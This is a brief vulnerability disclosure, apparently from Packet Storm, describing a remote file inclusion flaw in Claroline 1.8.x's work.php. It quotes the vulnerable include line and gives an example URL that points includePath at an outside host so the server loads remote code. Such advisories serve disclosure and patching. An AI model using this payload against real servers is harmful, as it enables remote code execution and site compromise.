Claroline version 1.8.x suffers from a remote file inclusion vulnerability in work.php.
a07b3880e276ec33a684332d04d3b9228dbbb46074e3fa26daa723029de2b5bd******************Claroline 1.8.x Remote File Inclusion Vulnerability****************
****By****: e.wiZz!
****Info****: Bosnian Idiot FTW! :D
------------cut here-------------------
In the wild....
*****Script*****: claroline.net
****Info****: Claroline is an Open Source eLearning and eWorking platform allowing teachers to build effective online courses and to manage learning and collaborative activities on the web. Translated into 35 languages, Claroline has a large worldwide users’ and developers’ community.
****Vulnerability******
../claroline/work.php
include($includePath . '/lib/form.lib.php');
****Example****
http://www.inthewild.com/claroline/work.php?includePath=http://whatever
****Greetz*****
f34r(croatian idiot :D),suN8Hclf and dark-coders,aluigi,Rishi Narang
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed